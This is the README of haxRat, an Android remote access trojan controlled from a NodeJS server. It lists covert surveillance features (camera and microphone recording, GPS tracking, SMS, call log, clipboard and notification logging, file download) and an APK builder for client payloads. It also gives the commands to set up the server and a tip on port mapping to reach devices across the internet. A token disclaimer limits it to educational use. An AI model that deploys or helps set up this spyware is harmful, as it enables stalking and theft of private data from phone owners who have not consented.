A cloud based remote android managment suite, powered by NodeJS
- Screenshot Capture
- Screen Recorder
- Rear Camera Recorder
- Front Camera Recorder
- Lock Device
- GPS Logging
- Microphone Recording
- View Contacts
- SMS Logs
- Send SMS
- Call Logs
- View Installed Apps
- View Stub Permissions
- Live Clipboard Logging
- Live Notification Logging
- View WiFi Networks (logs previously seen)
- File Explorer & Downloader
- Command Queuing
- Built In APK Builder
- Call Blocker
apt install haxrat
- Run server
haxrat
-
Install NodeJs
apt install nodejs
-
Clone
git clone https://github.com/hax4us/haxRat.git
-
Goto server directory
cd haxRat/server
-
Install all dependencies
npm install
-
Make a separate directory where haxrat app will be save
mkdir ~/haxrat
-
Run server
node index.js
-
In your browser navigate to
http://<SERVER IP>:22533
& Login with default username and password ( By default server will run on localhost and to make a client APP you can use PORTMAP to access APP on wide area network , check below for demo to setup haxRAT with PORTMAP.)
For default PASSWORD CLICK HERE
This video contains instructions for getting password CLICK HERE
- Inspiration for the project and the basic building blocks for the Android App are based off L3MON
- express
- node-geoip
- lowdb
- socket.io
- Open Street Map
- Leaflet
I ( Lokesh Pandey a.k.a Hax4Us ) Provides no warranty with this software and will not be responsible for any direct or indirect damage caused due to the usage of this tool.
haxRat is built for both Educational and Internal use ONLY.